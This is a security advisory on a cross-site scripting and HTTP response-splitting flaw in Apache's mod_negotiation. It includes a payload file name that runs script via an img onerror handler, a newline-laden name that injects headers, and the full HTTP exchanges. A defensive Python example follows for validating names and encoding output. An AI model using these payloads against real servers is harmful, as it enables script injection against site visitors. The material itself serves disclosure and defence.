BUGTRAQ ID: 27409

Apache HTTP Server is a popular web server.

Apache's mod_negotiation does not properly filter file names when it places them in the body of 406 Not Acceptable responses and 300 Multiple Choices messages, which can lead to cross-site scripting. In addition, because the list of file names is also sent unfiltered (in the Alternates header), a file name that contains newline characters can cause HTTP response splitting.

I. Cross-site scripting

Assume the mod_negotiation module is enabled and an attacker can upload files with arbitrary names and MIME extensions, for example a JPEG file named:

<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg

Then request that file with the Accept header set to image/jpeg; q=0

----------------------------------------------------
GET <img%20src=sa%20onerror=eval(document.location.hash.substr(1))> HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0

HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 15:43:11 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg" 1 {type image/jpeg} {length 2}}
Vary: negotiate
TCN: list
Content-Length: 610
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /&lt;img src=sa onerror=eval(document.location.hash.substr(1))&gt; could not be found on this server.</p>
Available variants:
<ul>
<li><a href="<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg"> <img src=sa onerror=eval(document.location.hash.substr(1))>.jpg</a> , type image/jpeg</li>
</ul>
<hr>
-----------------------------------------------------

As can be seen, the file name is echoed into the variant list without filtering, resulting in cross-site scripting.

II. HTTP response splitting

If a file name like the following can be set (it contains embedded newlines), the same technique triggers HTTP response splitting:

'junk
Header: Injected
blah:.jpg'

Then request the URL-encoded file name:

------------------------------------------------------
GET /junk%0aHeader:%20Injected%0ablah: HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0

HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 16:06:52 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"junk
Header: Injected <----- Here!
blah:.jpg" 1 {type image/jpeg} {length 2}}
Vary: negotiate
TCN: list
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /junk Header: Injected blah: could not be found on this server.</p>
Available variants:
<ul>
<li><a href="junk Header: Injected blah:.jpg">junk Header: Injected blah:.jpg</a> , type image/jpeg</li>
</ul>
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at 127.0.0.1 Port 80</address>
</body></html>
------------------------------------------------------

As can be seen, the response headers are split and a "Header: Injected" line has been injected.

Affected versions:

Apache Group Apache <= 1.3.39
Apache Group Apache <= 2.2.6
Apache Group Apache <= 2.0.61

Vendor patch:

Apache Group
------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.apache.org
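As an added example (not code from the advisory or from Apache), the following Python shows the two defensive controls this issue calls for on the application side: an upload-time name check that refuses both classes of file name used in sections I and II above, and an output-encoded rendering of a variant entry. It also rebuilds the Alternates header from the section II name and splits it where an HTTP parser would, so the injected header line is visible. The function names, the allowed character set and the sample names are assumptions constructed for this example.

```python
import html
import re
from typing import List, Optional
from urllib.parse import quote

# Constructed sample names, copied from the advisory's two scenarios.
XSS_NAME = '<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg'
SPLIT_NAME = 'junk\nHeader: Injected\nblah:.jpg'

HTML_META = set('<>"\'&')     # can open markup inside the HTML variant list
HEADER_CTL = set('\r\n\x00')  # end a header line inside "Alternates:"

def unsafe_name_reason(name: str) -> Optional[str]:
    """Upload-side policy (assumed, not Apache's): say why a candidate variant
    file name must be refused, or return None when it is acceptable."""
    if any(c in HEADER_CTL for c in name):
        return 'control character (CR/LF/NUL): header injection'
    if any(c in HTML_META for c in name):
        return 'HTML metacharacter: script injection in variant listing'
    if not re.fullmatch(r'[A-Za-z0-9._-]{1,255}', name):
        return 'character outside the allowed set'
    return None

def alternates_header_lines(name: str, mime: str = 'image/jpeg',
                            length: int = 2) -> List[str]:
    """Build the Alternates: header in the form the advisory's 406 response
    shows, then split it where an HTTP parser would: a CR/LF inside the
    name turns the remainder into extra header lines."""
    header = ('Alternates: {"' + name + '" 1 {type ' + mime
              + '} {length ' + str(length) + '}}')
    return header.replace('\r\n', '\n').split('\n')

def variant_list_item(name: str, mime: str) -> str:
    """Render one 'Available variants' entry with the output encoding the
    vulnerable listing lacked: percent-encode the href, HTML-escape the text."""
    return '<li><a href="%s">%s</a> , type %s</li>' % (
        quote(name), html.escape(name), html.escape(mime))

if __name__ == '__main__':
    for n in (XSS_NAME, SPLIT_NAME, 'photo.jpg'):
        print(repr(n), '->', unsafe_name_reason(n))
    for line in alternates_header_lines(SPLIT_NAME):
        print(line)
    print(variant_list_item(XSS_NAME, 'image/jpeg'))
```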